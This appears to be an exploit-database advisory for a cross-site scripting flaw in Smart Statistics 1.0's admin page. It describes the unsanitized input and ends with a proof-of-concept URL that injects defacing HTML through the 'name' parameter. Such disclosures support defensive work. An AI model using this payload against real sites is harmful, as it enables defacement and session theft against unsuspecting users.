Smart Statistics 1.0 - smart_Statistics_admin.php Cross-Site Scripting

2010-01-10T00:00:00
ID EXPLOITPACK:68869BBDD4987143C112CE3B912D5699
Type exploitpack
Reporter R3d-D3V!L
Modified 2010-01-10T00:00:00

Description

Smart Statistics 1.0 - smart_Statistics_admin.php Cross-Site Scripting

                                        
                                            source: https://www.securityfocus.com/bid/40468/info

Smart Statistics is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Smart Statistics 1.0 is vulnerable; other versions may also be affected. 

http:/www.example.com/74rG37_H057/smart_statistics_admin.php?type=page&name=">><FONT SIZE="70" FACE="courier" COLOR=red><MARQUEE BEHAVIOR=SCROLL HEIGHT=25 WIDTH=300 BGColor=navy>R3d-D3v!L W@S h3R3</MARQUEE></FONT>